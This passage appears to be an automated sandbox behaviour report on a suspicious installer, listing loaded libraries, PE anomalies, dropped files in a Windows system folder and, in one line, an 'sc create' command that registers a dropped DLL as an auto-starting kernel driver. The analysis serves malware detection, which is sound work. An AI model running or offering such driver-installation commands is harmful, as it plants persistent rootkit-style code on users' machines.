Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic file information: File size 5986125 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1804381617.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1804284846.0000000003870000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_007357D0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: real checksum: 0x0 should be: 0x5bdd3b
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a0e
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a0e
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .8Tk
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2286EB push ecx; ret 6_2_6C2286FE
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0D0F00 push ss; retn 0001h6_2_6C0D0F0A
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2F6F10 push eax; ret 6_2_6C2F6F2E
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C25B9F4 push 004AC35Ch; ret 6_2_6C25BA0E
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2F7290 push eax; ret 6_2_6C2F72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B45F4 push 0075C35Ch; ret 9_2_006B460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074FB10 push eax; ret 9_2_0074FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0074FE90 push eax; ret 9_2_0074FEBE
Source: update.vac.1.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
